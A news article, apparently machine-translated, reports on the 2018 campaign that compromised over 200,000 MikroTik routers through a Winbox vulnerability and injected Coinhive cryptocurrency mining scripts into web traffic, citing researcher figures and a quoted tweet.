The thing is that first the attacks of the concen but then spread to other countries, which already attracted the attention of Trustwave According to company analysts, according to information on August 1, 2018, unknown intruders compromised more than 72,000 MikroTik routers in Brazil alone.
At that time, only one hacker group practiced such attacks, as the specialists managed to identify only one Coinhive-key.
Researchers write that hackers exploit the new vulnerability that was discovered in the Winbox component in April of this year. Although MikroTik engineers quickly eliminated this dangerous RCE-bug, the owners of routers, unfortunately, still do not hurry to install the update on their devices. Meanwhile, PoC exploits (1, 2) and detailed analyzes have already been published for the vulnerability.
After hacking, the devices are used to manipulate traffic: routers forced to implement the mining script of Coinhive on all pages of all sites. Worse, according to experts, the attacks affected not only users of MikroTik devices. The fact is that some Brazilian providers use vulnerable routers in their main networks, and as a result of their compromise, injections of Coinhive affected a large percentage of traffic. Also such injections are dangerous not only for users directly. For example, if a site is hosted on a local network behind a MikroTik router, its traffic will also be infected by the Coinhive Miner.
However, the attackers quickly realized that building a miner literally everywhere is not a good idea, as this behavior attracts too much attention . Then the operators of the malicious campaign decided to limit themselves to only the error pages returned by the routers. At the same time the mass attack does not decrease. After the campaign spread beyond Brazil, the number of infected Coinhive routers exceeded 180,000.
A simple search to the Shodan search engine shows that over 1.7 million MikroTik routers can be found on the Internet, that is, the attacker definitely has a place to turn around. Bleeping Computer reporters report that according to the information of the well-known IB expert Troy Mursch, the specialists were able to identify the second key Coinhive, introduced into the traffic of MikroTik devices. The second malicious campaign affected at least 25,000 routers, that is, more than 200,000 devices have already been compromised.
Coinhive site key “oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4” is used in another #cryptojacking campaign targeting MikroTik routers. In this case, over 25,000 affected hosts are found on @censysio
h / t @onyphe https://t.co/M9iLatsIVX
– Bad Packets Report (@bad_packets) August 2, 2018